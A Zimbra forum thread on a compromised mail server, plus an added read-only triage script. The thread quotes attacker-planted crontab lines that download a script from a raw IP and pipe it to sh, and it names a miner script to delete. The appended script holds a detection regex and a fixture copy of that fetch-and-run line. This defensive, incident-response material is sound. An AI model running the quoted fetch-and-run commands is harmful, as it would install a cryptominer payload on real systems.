ERROR UPLOADING FILE AND UNABLE TO FORWARD ANY MAIL WITH ATTACHMENTS


Re: ERROR UPLOADING FILE AND UNABLE TO FORWARD ANY MAIL WITH ATTACHMENTS

Postby thiagolinhares » Thu Oct 03, 2019 1:07 pm

Thank you.
I've got a case identical to yours, where the server has been hacked and compromised.
Many upgrades, patches, "zmfixperms" etc., and nothing solved it.

Checking "/opt/zimbra/data/tmp/upload" permissions, it was

dr-xr-x---  2 zimbra zimbra 4096 May 24 17:04 upload

After running

chmod -R 755 /opt/zimbra/data/tmp/upload/
the problem has gone away! :lol: :lol: :lol:


Todorov wrote: Well, it seems to be the symptom of a hack. First of all, you should update your Zimbra to the latest version and patch it. But it's not enough to solve the problem. You have to look for the weird or new files, particularly with .pl or .sh extensions. I have seen several hacked Zimbra servers with similar symptoms. And as far as I know, there's no automated way to restore the system. One must do some hand operations.

Before you start, read the following articles:
https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/
https://lorenzo.mile.si/zimbra-zmcat-zm ... -cpu/1018/
https://forums.zimbra.com/viewtopic.php?f=15&t=66251
viewtopic.php?t=66005
viewtopic.php?t=66031
viewtopic.php?t=65932&start=140

After that.
Control your CPU load. If it's abnormally high, find the process, which loads it.
Probably you'll have to look for the *.sh files in ~/log/ , for example, /opt/zimbra/log/zmswatch.sh
Delete it if it exists, because it's a viral script by bitcoin miners, burn'em in hell to the end of days.

If your CPU load becomes normal, that's all right, let's continue.
Have a look at the zimbra crontab file (crontab -e).
At the very end of it you may see the line(s)
* * * * * wget -q -O - http://93.113.108.146:443/cr.sh | sh > /dev/null 2>&1
*/15 * * * * sh /opt/zimbra/log/zmswatch.sh
(They may be at the VERY-VERY end, thousands of lines down. So simply cat the file /var/spool/cron/zimbra; if it has suspicious lines, it has been hacked).

Then regenerate your crontab file this way: https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
After all these steps you may have to do some additional ones, because the hackers may change some files and/or locations. The best practice here is to move your mailboxes to the totally new installation.

BUT, returning to your question,

The problem of attachment and resend messages lies in wrong permissions for the /opt/zimbra/data/tmp/upload/ directory.
So execute as root

chmod -R 755 /opt/zimbra/data/tmp/upload/

- and that's it.
Maybe you'll have to change permissions even for the whole tmp directory:

chmod -R 755 /opt/zimbra/data/tmp/


Sorry for my English.
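
A read-only triage check for the three things the quoted steps inspect: the zimbra crontab, *.sh files in the log directory, and the upload directory mode. This is an added example, not part of the original posts; it runs against a constructed fixture, and the function names, the example.invalid host and the sample crontab lines are assumptions.

```shell
#!/bin/sh
# Added triage example, not code from the thread. Read-only: reports, never deletes.

# Crontab lines that pipe a download into a shell or run a .sh from a log dir.
suspicious_cron_lines() {
    grep -nE '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh|/log/[^[:space:]]+\.sh' "$1"
}

# Shell scripts sitting directly in a log directory.
stray_log_scripts() {
    find "$1" -maxdepth 1 -type f -name '*.sh'
}

# True when the owner write bit is set (read from the mode string, so the
# result does not depend on which user runs the check).
owner_can_write() {
    [ "$(ls -ld "$1" | cut -c3)" = "w" ]
}

# Constructed fixture standing in for /var/spool/cron/zimbra, /opt/zimbra/log
# and /opt/zimbra/data/tmp/upload; example.invalid is a placeholder host.
make_fixture() {
    d=$(mktemp -d) || return 1
    mkdir "$d/log" "$d/upload"
    : > "$d/log/zmswatch.sh"
    : > "$d/log/mailbox.log"
    chmod 550 "$d/upload"          # dr-xr-x---, the mode quoted in the post
    cat > "$d/crontab" <<'EOF'
*/2 * * * * /opt/zimbra/libexec/zmstatuslog > /dev/null 2>&1
* * * * * wget -q -O - http://example.invalid/cr.sh | sh > /dev/null 2>&1
*/15 * * * * sh /opt/zimbra/log/zmswatch.sh
EOF
    echo "$d"
}

fx=$(make_fixture)
suspicious_cron_lines "$fx/crontab"     # prints lines 2 and 3 with numbers
stray_log_scripts "$fx/log"             # prints the zmswatch.sh path only
owner_can_write "$fx/upload" || echo "$fx/upload: owner cannot write"
chmod 750 "$fx/upload" && rm -rf "$fx"
```

On a real server, point the functions at /var/spool/cron/zimbra, /opt/zimbra/log and /opt/zimbra/data/tmp/upload. The dr-xr-x--- mode quoted in the post lacks only the owner write bit, which is what owner_can_write reports.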


